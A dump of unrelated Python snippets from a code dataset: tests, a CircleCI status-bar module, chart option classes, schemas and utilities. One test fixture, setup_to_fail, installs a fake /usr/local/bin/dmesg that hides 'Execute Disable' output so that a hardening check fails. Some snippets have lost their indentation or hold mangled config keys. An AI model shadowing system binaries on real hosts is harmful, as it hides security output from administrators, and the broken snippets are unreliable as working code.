code stringlengths 281 23.7M |
|---|
def test_override_providers_context_manager():
    """Providers overridden via ``override_providers()`` are reset on exit.

    Inside the ``with`` block the container's providers must report the
    overriding providers; once the context manager exits, the overrides
    must be gone again.
    """
    p1 = providers.Provider()
    p2 = providers.Provider()
    container = Container()
    with container.override_providers(p11=p1, p12=p2) as context_container:
        # The context manager yields the container itself.
        assert container is context_container
        assert container.p11.last_overriding is p1
        assert container.p12.last_overriding is p2
    # BUG FIX: the reset checks must run *after* the context manager exits;
    # inside the block they would directly contradict the asserts above.
    assert container.p11.last_overriding is None
    assert container.p12.last_overriding is None
def create_all_search_playlist(groups, exaile):
    """Build and register a search playlist matching *all* of ``groups``.

    Each group is matched as a whole word against the current tag (spaces
    normalised to underscores), and the individual terms are space-joined
    so the search ANDs them together.
    """
    tag = get_tagname()
    title = '%s: %s' % (tag.title(), ' and '.join(groups))
    terms = []
    for group in groups:
        escaped = re.escape(group.replace(' ', '_'))
        terms.append('%s~"\\b%s\\b"' % (tag, escaped))
    _create_search_playlist(title, ' '.join(terms), exaile)
def test_create_key(db: Session):
    """The StorageConfig key is derived from the name, which is mandatory."""
    # Creating a StorageConfig without a name must be rejected.
    with pytest.raises(KeyValidationError) as exc:
        StorageConfig.create(db, data={'type': StorageType.s3.value, 'details': {'bucket': 'some-bucket'}})
    assert (str(exc.value) == 'StorageConfig requires a name.')
    # With a name supplied, the key is auto-derived (slugified) from it.
    sc = StorageConfig.create(db, data={'name': 'test dest', 'type': StorageType.s3.value, 'details': {'bucket': 'some-bucket', 'naming': 'some-filename-convention-enum', 'max_retries': 10}})
    assert (sc.key == 'test_dest')
    # Clean up the created row so the test leaves no state behind.
    db.query(StorageConfig).filter_by(key='test_dest').delete()
class CircleCI(IntervalModule):
    """i3pystatus module showing the CircleCI status of a repository.

    Reports either the last build summary (default) or, when
    ``workflow_name``/``workflow_branch`` is set, the latest workflow status.
    Left click opens the build/workflow page in the browser.
    """

    settings = ('format', ('circleci_token', 'circleci access token'), ('repo_slug', 'repository identifier eg. "enkore/i3pystatus"'), ('time_format', 'passed directly to .strftime() for `last_build_started`'), ('repo_status_map', 'map representing how to display status'), ('duration_format', '`last_build_duration` format string'), ('status_color_map', 'color for all text based on status'), ('color', 'color for all text not otherwise colored'), ('workflow_name', '[WORKFLOWS_ONLY] if specified, monitor this workflows status. if not specified this module will default to reporting the status of your last build'), ('workflow_branch', '[WORKFLOWS_ONLY] if specified, monitor the workflows in this branch'))
    required = ('circleci_token', 'repo_slug')
    format = '{repo_owner}/{repo_name}-{repo_status} [({last_build_started}({last_build_duration}))]'
    short_format = '{repo_name}-{repo_status}'
    time_format = '%m/%d'
    duration_format = '%m:%S'
    status_color_map = None
    repo_slug = None
    circleci_token = None
    repo_status_map = None
    color = '#DDDDDD'
    workflow_name = None
    workflow_branch = None
    circleci = None
    on_leftclick = 'open_build_webpage'

    def init(self):
        # Status fields populated lazily by run().
        self.repo_status = None
        self.last_build_duration = None
        self.last_build_started = None
        self.repo_owner, self.repo_name = self.repo_slug.split('/')
        # Workflow mode is enabled as soon as either workflow setting is given.
        self.workflows = self.workflow_name is not None or self.workflow_branch is not None

    def _format_time(self, time):
        """Render an API timestamp string using ``time_format``."""
        _datetime = dateutil.parser.parse(time)
        return _datetime.strftime(self.time_format)

    # NOTE(review): this decorator was mangled to a bare '(internet)'
    # expression in the original source; restored to the i3pystatus
    # connectivity guard it has to be.
    @require(internet)
    def run(self):
        if self.circleci is None:
            # Create the API client once and reuse it across intervals.
            self.circleci = Api(self.circleci_token)
        if self.workflows:
            if self.workflow_branch and not self.workflow_name:
                self.output = dict(full_text='workflow_name must be specified!')
                return
            project = {p['reponame']: p for p in self.circleci.get_projects()}.get(self.repo_name)
            if not self.workflow_branch:
                # Fall back to the project's default branch.
                self.workflow_branch = project.get('default_branch')
            workflow_info = project['branches'].get(self.workflow_branch)['latest_workflows'].get(self.workflow_name)
            self.last_build_started = self._format_time(workflow_info.get('created_at'))
            self.repo_status = workflow_info.get('status')
            # Workflows carry no duration in this payload.
            self.last_build_duration = ''
        else:
            self.repo_summary = self.circleci.get_project_build_summary(self.repo_owner, self.repo_name, limit=1)
            if len(self.repo_summary) != 1:
                return
            self.repo_summary = self.repo_summary[0]
            self.repo_status = self.repo_summary.get('status')
            self.last_build_started = self._format_time(self.repo_summary.get('queued_at'))
            try:
                self.last_build_duration = TimeWrapper(self.repo_summary.get('build_time_millis') / 1000, default_format=self.duration_format)
            except TypeError:
                # build_time_millis may be None for queued/failed builds.
                self.last_build_duration = 0
        if self.repo_status_map:
            self.repo_status = self.repo_status_map.get(self.repo_status, self.repo_status)
        self.output = dict(full_text=formatp(self.format, **vars(self)), short_text=self.short_format.format(**vars(self)))
        if self.status_color_map:
            self.output['color'] = self.status_color_map.get(self.repo_status, self.color)
        else:
            self.output['color'] = self.color

    def open_build_webpage(self):
        """Open the CircleCI page of the last build/workflow in the browser."""
        if self.repo_summary.get('workflows'):
            url_path = 'workflow-run/{}'.format(self.repo_summary['workflows']['workflow_id'])
        else:
            # BUG FIX: the placeholders were never filled in; build the path
            # from the summary (the CircleCI API exposes the build id as
            # 'build_num' -- TODO confirm against the API version in use).
            url_path = 'gh/{repo_owner}/{repo_name}/{job_number}'.format(
                repo_owner=self.repo_owner,
                repo_name=self.repo_name,
                job_number=self.repo_summary.get('build_num'),
            )
        # BUG FIX: the original format string had no '{}' and no URL at all,
        # so xdg-open was invoked with nothing to open.
        os.popen('xdg-open https://circleci.com/{} > /dev/null'.format(url_path))
def _get_pred_labels_from_prob(dataframe: pd.DataFrame, prediction_column: list) -> List[str]:
array_prediction = dataframe[prediction_column].to_numpy()
prediction_ids = np.argmax(array_prediction, axis=(- 1))
prediction_labels = [prediction_column[x] for x in prediction_ids]
return prediction_labels |
def resistor_label(colors):
    """Translate resistor color bands into a human-readable label.

    A single band is the zero-ohm jumper; four bands use two value digits,
    anything else is treated as a five-band resistor with three value
    digits.  The last band always encodes the tolerance.
    """
    if len(colors) == 1:
        # Plain string: the original used an f-string with no placeholders.
        return '0 ohms'
    digits = 2 if len(colors) == 4 else 3
    return _format_banded_resistor(colors, digits)


def _format_banded_resistor(colors, digits):
    """Decode ``digits`` value bands, one multiplier band and a tolerance band."""
    value = 0
    for band in colors[:digits]:
        value = value * 10 + COLORS.index(band)
    value *= 10 ** COLORS.index(colors[digits])
    value, unit = color_code(value)
    # Drop the trailing ".0" for whole values (e.g. "33 kiloohms").
    if value.is_integer():
        value = int(value)
    return f'{value} {unit} {COLORS_TOLERANCE[colors[digits + 1]]}%'
def test_check_typed_prims_invalid_bend():
    """A bend defined on bent water must be rejected for linear water."""
    geom_kwargs = {'coord_type': 'redund'}
    # Regular (bent) water; its redundant internals include an H-O-H bend.
    h2o_zmat = 'O\n H 1 0.96\n H 1 0.96 2 104.5\n '
    geom = geom_from_zmat_str(h2o_zmat, **geom_kwargs)
    typed_prims = geom.internal.typed_prims
    # Third primitive is expected to be the bend (after the two bonds).
    bend = typed_prims[2]
    assert (bend[0] == PrimTypes.BEND)
    # Linear water (angle 180 deg): the ordinary bend becomes ill-defined.
    h2o_linear_zmat = 'O\n H 1 0.96\n H 1 0.96 2 180.0\n '
    geom_linear = geom_from_zmat_str(h2o_linear_zmat, **geom_kwargs)
    valid_typed_prims = check_typed_prims_for_geom(geom_linear, typed_prims)
    assert (bend not in valid_typed_prims)
class OptionPlotoptionsFunnel3dSonificationContexttracksMappingPan(Options):
    """Accessors for the ``pan`` mapping options of a sonification context track.

    NOTE(review): the original source had two same-named plain ``def``s per
    option (the second silently shadowing the first) -- almost certainly
    stripped ``@property`` / ``@<name>.setter`` decorators, restored here so
    both the getter and the setter are reachable.
    """

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
def list_router_factory(fides_model: FidesModelType, model_type: str) -> APIRouter:
    """Build an APIRouter exposing a scoped ``GET /`` list endpoint for *model_type*."""
    router = APIRouter(prefix=f'{API_PREFIX}/{model_type}', tags=[fides_model.__name__])

    # NOTE(review): the route decorator was mangled into a bare expression in
    # the original source; restored as the registration it has to be
    # (GET, per the 'List' name and List[...] response model).
    @router.get(path='/', dependencies=[Security(verify_oauth_client_prod, scopes=[f'{CLI_SCOPE_PREFIX_MAPPING[model_type]}:{READ}'])], response_model=List[fides_model], name='List')
    async def ls(db: AsyncSession = Depends(get_async_db)) -> List:
        """Return every stored resource of this model type."""
        sql_model = sql_model_map[model_type]
        return await list_resource(sql_model, db)

    return router
class AirflowPipelineProcessorResponse(RuntimePipelineProcessorResponse):
    """Response payload for pipelines submitted to Apache Airflow."""

    # Runtime identification used by the processor registry.
    _type = RuntimeProcessorType.APACHE_AIRFLOW
    _name = 'airflow'

    def __init__(self, git_url, run_url, object_storage_url, object_storage_path):
        super().__init__(run_url, object_storage_url, object_storage_path)
        # URL of the git repository the generated DAG was pushed to.
        self.git_url = git_url

    def to_json(self):
        """Serialise the response, extending the base payload with ``git_url``."""
        payload = super().to_json()
        payload['git_url'] = self.git_url
        return payload
def extractNorthstarnovelsCom(item):
    """Parse a northstarnovels.com feed item into a release message.

    Returns ``None`` for previews or items without volume/chapter info,
    ``False`` when no known tag matched, otherwise the built message.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or 'preview' in item['title'].lower():
        return None
    tagmap = [
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tagname, name, tl_type in tagmap:
        if tagname not in item['tags']:
            continue
        return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
def test_raises_if_username_in_blacklist():
    """A blacklisted username must be rejected with a descriptive reason."""
    requirements = UsernameRequirements(min=1, max=100, blacklist={'no'})
    validator = UsernameValidator(requirements)
    registration = UserRegistrationInfo(
        username='no', password='no', email='', group=4, language='no')
    with pytest.raises(ValidationError) as excinfo:
        validator(registration)
    error = excinfo.value
    assert error.attribute == 'username'
    assert 'forbidden username' in error.reason
def zeroshot_cfg_string():
    """Return an inline spacy config string for a zero-shot textcat LLM pipeline.

    NOTE(review): the option keys inside the ``[components.llm.*]`` sections
    look garbled (``_tasks``/``_models`` and a bare ``=``) -- in spacy
    configs these are registry references such as ``@llm_tasks`` -- confirm
    against the original fixture before relying on this string.
    """
    return '\n [nlp]\n lang = "en"\n pipeline = ["llm"]\n batch_size = 128\n\n [components]\n\n [components.llm]\n factory = "llm"\n\n [components.llm.task]\n _tasks = "spacy.TextCat.v1"\n labels = "Recipe"\n exclusive_classes = true\n\n [components.llm.task.normalizer]\n = "spacy.LowercaseNormalizer.v1"\n\n [components.llm.model]\n _models = "spacy.GPT-3-5.v2"\n '
class TestXGMIIPHY(unittest.TestCase):
    """Simulation tests for the LiteEth XGMII PHY (64-bit datapath)."""

    def test_xgmii_rx(self):
        """Replay a captured XGMII trace into the RX PHY and compare streams.

        Packets decoded from the bus capture by the collector must match,
        byte for byte, the packets emitted on the PHY's stream source.
        """
        csv_file = ((Path(__file__).parent / 'assets') / 'xgmii_bus_capture.csv')
        xgmii_injector = XGMII64bCSVReader(csv_file.resolve(), complete_trailing_transaction=True)
        # tolerate_dic=False: the capture is not expected to rely on the
        # deficit idle count mechanism.
        xgmii_collector = XGMIICollector(min_interframegap=5, tolerate_dic=False, debug_print=True)
        xgmii_interface = Record([('rx_ctl', 8), ('rx_data', 64), ('tx_ctl', 8), ('tx_data', 64)])
        dut = LiteEthPHYXGMIIRX(xgmii_interface, 64)
        recvd_packets = []
        # Run injector, bus-side collector and stream-side collector in
        # parallel; stop once the injector is done and no packet is mid-flight.
        run_simulation(dut, [xgmii_injector.inject(xgmii_interface), xgmii_collector.collect(xgmii_interface, tap_signals='rx', stop_cond=(lambda : (xgmii_injector.done() and (xgmii_collector.current_packet is None)))), stream_collector(dut.source, dest=recvd_packets, stop_cond=xgmii_injector.done, seed=42, debug_print=True, ready_rand=0)])
        self.assertTrue((len(recvd_packets) == len(xgmii_collector.packets)), 'Different number of received and sent packets: {} vs. {}!'.format(len(recvd_packets), len(xgmii_collector.packets)))
        for (p, (recvd, sent)) in enumerate(zip(recvd_packets, xgmii_collector.packets)):
            self.assertTrue((len(recvd.data) == len(sent)), ('Packet sent and received with different length: {} vs. {} ' + 'at packet {}!').format(len(recvd.data), len(sent), p))
            for (i, (a, b)) in enumerate(zip(recvd.data, sent)):
                self.assertTrue((a == b), ('Byte sent and received differ: {} vs. {} at {} byte of ' + 'packet {}').format(a, b, i, p))

    def test_xgmii_stream_loopback(self):
        """Loop the full PHY's RX stream back into its TX path.

        Whatever is observed on the RX side of the XGMII bus must reappear,
        packet for packet and byte for byte, on the TX side.
        """
        csv_file = ((Path(__file__).parent / 'assets') / 'xgmii_bus_capture.csv')
        xgmii_injector = XGMII64bCSVReader(csv_file.resolve(), complete_trailing_transaction=True)
        xgmii_rx_collector = XGMIICollector(min_interframegap=5, tolerate_dic=False, debug_print=True)
        # TX side may legally use the deficit idle count, hence tolerate_dic.
        xgmii_tx_collector = XGMIICollector(min_interframegap=12, tolerate_dic=True, debug_print=True)

        class DUT(Module):
            def __init__(self):
                self.xgmii_interface = Record([('rx_ctl', 8), ('rx_data', 64), ('tx_ctl', 8), ('tx_data', 64)])
                # Run both eth clock domains on the system clock for simulation.
                self.submodules.ethphy = ClockDomainsRenamer({'eth_tx': 'sys', 'eth_rx': 'sys'})(LiteEthPHYXGMII(Record([('rx', 1), ('tx', 1)]), self.xgmii_interface, model=True))
                # Small FIFO closing the loop from the PHY source to its sink.
                self.submodules.loopback_fifo = SyncFIFO(self.ethphy.source.payload.layout, 4, True)
                self.comb += [self.ethphy.source.connect(self.loopback_fifo.sink), self.loopback_fifo.source.connect(self.ethphy.sink)]

        dut = DUT()
        # Stop injecting only once both collectors have drained their traffic.
        run_simulation(dut, [xgmii_rx_collector.collect(dut.xgmii_interface, tap_signals='rx', stop_cond=(lambda : (xgmii_injector.done() and (xgmii_rx_collector.current_packet is None)))), xgmii_tx_collector.collect(dut.xgmii_interface, tap_signals='tx', stop_cond=(lambda : (xgmii_injector.done() and (xgmii_tx_collector.current_packet is None) and (len(xgmii_tx_collector.packets) >= len(xgmii_rx_collector.packets))))), xgmii_injector.inject(dut.xgmii_interface, stop_cond=(lambda : ((not xgmii_rx_collector.collecting) and (not xgmii_tx_collector.collecting))))])
        self.assertTrue((len(xgmii_rx_collector.packets) == len(xgmii_tx_collector.packets)), 'Different number of sent and received packets: {} vs. {}!'.format(len(xgmii_rx_collector.packets), len(xgmii_tx_collector.packets)))
        for (p, (recvd, sent)) in enumerate(zip(xgmii_tx_collector.packets, xgmii_rx_collector.packets)):
            self.assertTrue((len(recvd) == len(sent)), ('Packet sent and received with different length: {} vs. {} at ' + 'packet {}!').format(len(recvd), len(sent), p))
            for (i, (a, b)) in enumerate(zip(recvd, sent)):
                self.assertTrue((a == b), ('Byte sent and received differ: {} vs. {} at {} byte of ' + 'packet {}').format(a, b, i, p))
class PDTable():
    """Filterable table of primary directions computed for a chart."""

    def __init__(self, chart, aspList=const.MAJOR_ASPECTS):
        directions = PrimaryDirections(chart)
        # Each entry is a tuple whose fields are (arc, promissor, significator, ...).
        self.table = directions.getList(aspList)

    def view(self, arcmin, arcmax):
        """Return directions whose arc lies strictly between the two bounds."""
        return [entry for entry in self.table if arcmin < entry[0] < arcmax]

    def bySignificator(self, ID):
        """Return directions whose significator field contains *ID*."""
        return [entry for entry in self.table if ID in entry[2]]

    def byPromissor(self, ID):
        """Return directions whose promissor field contains *ID*."""
        return [entry for entry in self.table if ID in entry[1]]
def test_outcome_by_span_exception(elasticapm_client):
    """Span outcome is 'failure' when the span body raises, 'success' otherwise."""
    elasticapm_client.begin_transaction('test')
    try:
        with elasticapm.capture_span('fail', 'test_type'):
            assert False
    except AssertionError:
        # Expected: capture_span re-raises, so swallow it here.
        pass
    with elasticapm.capture_span('success', 'test_type'):
        pass
    elasticapm_client.end_transaction('test')
    transaction = elasticapm_client.events[TRANSACTION][0]
    spans = elasticapm_client.spans_for_transaction(transaction)
    fail_span, success_span = spans[0], spans[1]
    assert fail_span['name'] == 'fail'
    assert fail_span['outcome'] == 'failure'
    assert success_span['name'] == 'success'
    assert success_span['outcome'] == 'success'
def start_controller(folder: Path, command: str, tasks_per_node: int=1, cuda_devices: str='', timeout_min: float=5.0, signal_delay_s: int=30, stderr_to_stdout: bool=False, setup: tp.Sequence[str]=()) -> "subprocess.Popen['bytes']":
    """Spawn the local submitit controller process for *folder*.

    Job parameters are handed to the child through ``SUBMITIT_*`` environment
    variables.  When *setup* commands are given, the controller is launched
    through a shell so those commands can run first.
    """
    env = dict(os.environ)
    env.update(
        SUBMITIT_LOCAL_NTASKS=str(tasks_per_node),
        SUBMITIT_LOCAL_COMMAND=command,
        SUBMITIT_LOCAL_TIMEOUT_S=str(int(60 * timeout_min)),
        SUBMITIT_LOCAL_SIGNAL_DELAY_S=str(int(signal_delay_s)),
        SUBMITIT_LOCAL_NODEID='0',
        SUBMITIT_LOCAL_JOB_NUM_NODES='1',
        SUBMITIT_STDERR_TO_STDOUT='1' if stderr_to_stdout else '',
        SUBMITIT_EXECUTOR='local',
        CUDA_VISIBLE_DEVICES=cuda_devices,
        SUBMITIT_LOCAL_WITH_SHELL='1' if setup else '',
    )
    controller_cmd: tp.Any = [sys.executable, '-m', 'submitit.local._local', str(folder)]
    use_shell = bool(setup)
    if use_shell:
        # Prepend the setup commands and collapse everything into one shell line.
        controller_cmd = ' && '.join(list(setup) + [shlex.join(controller_cmd)])
    return subprocess.Popen(controller_cmd, shell=use_shell, env=env)
class PoseUtils():
    """Axis-permutation conversions between PyBullet and Unity frames.

    Covers positions, quaternions and scales.  The two methods of each pair
    are exact inverses of each other (axis conventions inferred from the
    permutations below -- confirm against the engines if extending).
    """

    def __init__(self):
        pass

    def bullet_pos_to_unity_pos(self, pos: list):
        x, y, z = pos
        return [-y, z, x]

    def unity_pos_to_bullet_pos(self, pos: list):
        x, y, z = pos
        return [z, -x, y]

    def bullet_qua_to_unity_qua(self, qua: list):
        x, y, z, w = qua
        return [-y, z, x, -w]

    def unity_qua_to_bullet_qua(self, qua: list):
        x, y, z, w = qua
        return [z, -x, y, -w]

    def bullet_scale_to_unity_scale(self, scale: list):
        x, y, z = scale
        return [y, z, x]

    def unity_scale_to_bullet_scale(self, scale: list):
        x, y, z = scale
        return [z, x, y]
def get_right_audio_support_and_sampling_rate(audio_format: str, sampling_rate: int):
    """Resolve the file extension and MIME/codec string for a TTS request.

    Args:
        audio_format: requested format name (falls back to 'mp3' when falsy).
        sampling_rate: requested rate in Hz, or a falsy value for "unspecified".

    Returns ``(file_extension, audio_format)`` where the format string may
    carry a ``;rate=...`` suffix.  Raises ProviderException for out-of-range
    rates, unknown formats, or formats that require an explicit rate.
    """
    if sampling_rate and (sampling_rate < 8000 or sampling_rate > 192000):
        raise ProviderException('Sampling rate must lie in the range of 8 kHz to 192 kHz')
    if not audio_format:
        audio_format = 'mp3'
    # Entry layout (inferred from usage below):
    # (name, extension, rate_required_flag, allowed_rates_or_None).
    right_audio_format = next(
        filter(lambda entry: entry[0] == audio_format, audio_format_list_extensions), None)
    if right_audio_format is None:
        # BUG FIX: an unknown format previously crashed with a TypeError on
        # ``None[1]``; raise the provider's own exception instead.
        raise ProviderException(f"Audio format '{audio_format}' is not supported")
    file_extension = right_audio_format[1]
    # e.g. 'pcm-s16le' -> 'audio/pcm;codecs=s16le'.
    audio_format = audio_format.replace('-', ';codecs=')
    audio_format = f'audio/{audio_format}'
    if not sampling_rate:
        if right_audio_format[2]:
            raise ProviderException(f"You must specify a sampling rate for the '{audio_format}' audio format")
        return (file_extension, audio_format)
    if right_audio_format[3] is None:
        # The format accepts any rate: drop the caller's value silently.
        return (file_extension, audio_format)
    if isinstance(right_audio_format[3], list) and len(right_audio_format[3]) > 0:
        # Snap to the closest rate the provider actually supports.
        nearest_rate = min(right_audio_format[3], key=lambda rate: abs(rate - sampling_rate))
        return (file_extension, f'{audio_format};rate={nearest_rate}')
    return (file_extension, f'{audio_format};rate={sampling_rate}')
class OptionPlotoptionsTimelineSonificationTracksMappingGapbetweennotes(Options):
    """Accessors for the timeline sonification ``gapBetweenNotes`` mapping.

    NOTE(review): the original source had two same-named plain ``def``s per
    option (the second silently shadowing the first) -- almost certainly
    stripped ``@property`` / ``@<name>.setter`` decorators, restored here so
    both the getter and the setter are reachable.
    """

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class TraditionalPokerScoreDetector(ScoreDetector):
    """Detects the best traditional-poker score for a set of cards."""

    def __init__(self, lowest_rank):
        # Lowest card rank in play (traditional poker may strip low cards).
        self._lowest_rank = lowest_rank

    def get_score(self, cards):
        """Return the highest-ranking TraditionalPokerScore for *cards*.

        Categories are probed from strongest to weakest; the first detector
        that yields a truthy result wins.
        """
        hand = Cards(cards, self._lowest_rank)
        candidates = (
            (TraditionalPokerScore.STRAIGHT_FLUSH, hand.straight_flush),
            (TraditionalPokerScore.QUADS, hand.quads),
            (TraditionalPokerScore.FLUSH, hand.flush),
            (TraditionalPokerScore.FULL_HOUSE, hand.full_house),
            (TraditionalPokerScore.STRAIGHT, hand.straight),
            (TraditionalPokerScore.TRIPS, hand.trips),
            (TraditionalPokerScore.TWO_PAIR, hand.two_pair),
            (TraditionalPokerScore.PAIR, hand.pair),
            (TraditionalPokerScore.NO_PAIR, hand.no_pair),
        )
        for category, detect in candidates:
            result = detect()
            if result:
                return TraditionalPokerScore(category, result)
        raise RuntimeError('Unable to detect the score')
class PdnsRecursorCfg(DummyPdnsCfg, models.Model):
    """Key/value configuration entry for the PowerDNS recursor.

    Rows live in the legacy ``cfg_recursor`` table.  ``pg_notify_payload``
    is presumably broadcast on changes so the recursor can reload its
    configuration -- see DummyPdnsCfg for the mechanism (TODO confirm).
    """

    # Payload string associated with configuration changes.
    pg_notify_payload = 'recursor_cfg_modified'
    # Human-readable object name used in change logs.
    log_object_name = 'PowerDNS recursor config'
    key = models.CharField(_('Key'), primary_key=True, max_length=32, null=False, unique=True, db_index=True, help_text='PowerDNS Recursor configuration parameter keys')
    val = models.TextField(_('Value'), null=True, default=None, help_text='PowerDNS Recursor configuration parameter values')
    change_date = models.IntegerField(_('Changed'), null=True, default=None, help_text='Timestamp of the last update.')

    class Meta():
        app_label = 'pdns'
        verbose_name = _('PowerDNS recursor cfg entry')
        verbose_name_plural = _('PowerDNS recursor config entries')
        db_table = 'cfg_recursor'
def _validate_end_states(end_states: List[str]) -> Tuple[(bool, str)]:
if (not isinstance(end_states, list)):
return (False, "Invalid type for roles. Expected list. Found '{}'.".format(type(end_states)))
for end_state in end_states:
if (not _is_valid_regex(END_STATE_REGEX_PATTERN, end_state)):
return (False, "Invalid name for end_state '{}'. End_state names must match the following regular expression: {} ".format(end_state, END_STATE_REGEX_PATTERN))
return (True, 'Dialogue end_states are valid.') |
def clear_tutorial(save_stats: dict[str, Any]) -> dict[str, Any]:
    """Mark the in-game tutorial as completed in *save_stats*.

    Also unlocks chapter-1 progress when the player has not progressed yet.
    The dict is mutated in place and returned for convenience.
    """
    save_stats['tutorial_cleared']['Value'] = 1
    chapters = save_stats['story_chapters']
    if chapters['Chapter Progress'][0] == 0:
        chapters['Chapter Progress'][0] = 1
        chapters['Times Cleared'][0][0] = 1
    print('Successfully cleared the tutorial')
    return save_stats
def setup_to_fail():
    """Generator fixture: shadow ``dmesg`` with a wrapper hiding "Execute Disable".

    Installs a fake /usr/local/bin/dmesg (earlier on PATH) that pipes the
    real dmesg output through grep, yields to the test, then removes it.
    """
    with open('/usr/local/bin/dmesg', 'w') as f:
        # The original wrapped the single command in a set literal passed to
        # writelines(); a plain write() of the one line is equivalent.
        f.write('/bin/dmesg | grep -v "Execute Disable"')
    # BUG FIX: chmod takes an octal mode; the decimal literal 755 produced
    # mode 01363 instead of rwxr-xr-x (0o755), leaving the script
    # non-executable for group/other.
    os.chmod('/usr/local/bin/dmesg', 0o755)
    print(shellexec('echo $PATH'))
    print(shellexec('which dmesg'))
    yield None
    os.remove('/usr/local/bin/dmesg')
class Matrix(GraphCanvas.Canvas):
    """Full-window "Matrix rain" canvas animation component."""

    name = 'Skin Matrix'
    _option_cls = OptSkins.OptionsSkin
    # Client-side builder: draws falling glyph columns on the 2D canvas and
    # re-renders every 35 ms; honours options.color and options.font_size.
    _js__builder__ = '\n var ctx = htmlObj.getContext("2d"); htmlObj.height = window.innerHeight; htmlObj.width = window.innerWidth;\n var matrix = "#$%^&*()*&^%+-/~{[|`]}";\n matrix = matrix.split(""); var columns = htmlObj.width / options.font_size; var drops = [];\n for(var x = 0; x < columns; x++){drops[x] = 1}\n function draw()\n {\n ctx.fillStyle = "rgba(0, 0, 0, 0.04)"; ctx.fillRect(0, 0, htmlObj.width, htmlObj.height);\n ctx.fillStyle = options.color; ctx.font = options.font_size + "px arial";\n for(var i = 0; i < drops.length; i++)\n {\n var text = matrix[Math.floor(Math.random()*matrix.length)];\n ctx.fillText(text, i* options.font_size, drops[i]* options.font_size);\n if(drops[i]* options.font_size > htmlObj.height && Math.random() > 0.975){ drops[i] = 0};\n drops[i]++;\n }\n }\n setInterval(draw, 35);\n '

    def __str__(self):
        """Emit the <canvas> tag, registering the JS builder first."""
        self.page.properties.js.add_builders(self.refresh())
        return ('<canvas %s>Your browser does not support the HTML5 canvas tag.</canvas>' % self.get_attrs(css_class_names=self.style.get_classes()))
class DiscountCodeSchemaEvent(DiscountCodeSchemaPublic):
    """JSON-API schema for event-level discount codes.

    NOTE(review): the two bare ``_schema(pass_original=True)`` expressions in
    the original are stripped marshmallow ``@validates_schema`` decorators;
    restored below so the validators actually run.
    """

    class Meta():
        # JSON-API resource metadata.
        type_ = 'discount-code'
        self_view = 'v1.discount_code_detail'
        self_view_kwargs = {'id': '<id>'}
        inflect = dasherize

    @validates_schema(pass_original=True)
    def validate_quantity(self, data, original_data):
        """Check min/max/tickets-number consistency, backfilling from the DB on update."""
        if 'id' in original_data['data']:
            try:
                discount_code = DiscountCode.query.filter_by(id=original_data['data']['id']).one()
            except NoResultFound:
                raise ObjectNotFound({'parameter': '{code}'}, 'DiscountCode: not found')
            # PATCH requests may omit fields; fall back to the stored values.
            if 'min_quantity' not in data:
                data['min_quantity'] = discount_code.min_quantity
            if 'max_quantity' not in data:
                data['max_quantity'] = discount_code.max_quantity
            if 'tickets_number' not in data:
                data['tickets_number'] = discount_code.tickets_number
        DiscountCodeSchemaEvent.quantity_validation_helper(data)
        if data.get('tickets_number') and data.get('max_quantity'):
            if (data['max_quantity'] >= 0) and (data['tickets_number'] < data['max_quantity']):
                raise UnprocessableEntityError({'pointer': '/data/attributes/tickets-number'}, 'tickets-number should be greater than max-quantity')

    @validates_schema(pass_original=True)
    def validate_date(self, data, original_data):
        """Ensure valid_till is not before valid_from, backfilling from the DB on update."""
        ends_at = data.get('valid_till', None)
        if 'id' in original_data['data']:
            try:
                discount_code = DiscountCode.query.filter_by(id=original_data['data']['id']).one()
            except NoResultFound:
                raise ObjectNotFound({'parameter': '{code}'}, 'DiscountCode: not found')
            if 'valid_from' not in data:
                data['valid_from'] = discount_code.valid_from
            ends_at = data.get('valid_till') or discount_code.valid_expire_time
        if ends_at and (data['valid_from'] > ends_at):
            raise UnprocessableEntityError({'pointer': '/data/attributes/valid-till'}, 'valid_till should be after valid_from')

    events = Relationship(self_view='v1.discount_code_events', self_view_kwargs={'id': '<id>'}, related_view='v1.event_list', related_view_kwargs={'discount_code_id': '<id>'}, schema='EventSchemaPublic', many=True, type_='event')
class ExecutionTimeout():
    """Context manager raising TimeoutError if the body runs too long.

    Uses SIGALRM, so it only works on the main thread of Unix platforms.
    ``seconds=0`` (the default) disables the timeout entirely.
    """

    def __init__(self, seconds=0, error_message='Execution took longer than the allotted time'):
        self.seconds = seconds
        self.error_message = error_message
        # Previous SIGALRM handler, stashed while we are active.
        self._previous_handler = None

    def _timeout_handler(self, signum, frame):
        raise TimeoutError(self.error_message)

    def __enter__(self):
        if self.seconds > 0:
            # IMPROVEMENT: remember the handler that was installed before us
            # so nested/outer users of SIGALRM are not silently broken.
            self._previous_handler = signal.signal(signal.SIGALRM, self._timeout_handler)
            signal.alarm(self.seconds)

    def __exit__(self, type, value, traceback):
        # Cancel any pending alarm, then restore the prior handler.
        signal.alarm(0)
        if self._previous_handler is not None:
            signal.signal(signal.SIGALRM, self._previous_handler)
            self._previous_handler = None
class GetFileRequest(DatClass):
    """Request payload for fetching a single drive file's metadata/URLs."""

    # Identifier of the file to fetch (required).
    file_id: str
    # Target drive; None presumably selects the account's default drive -- TODO confirm.
    drive_id: str = None
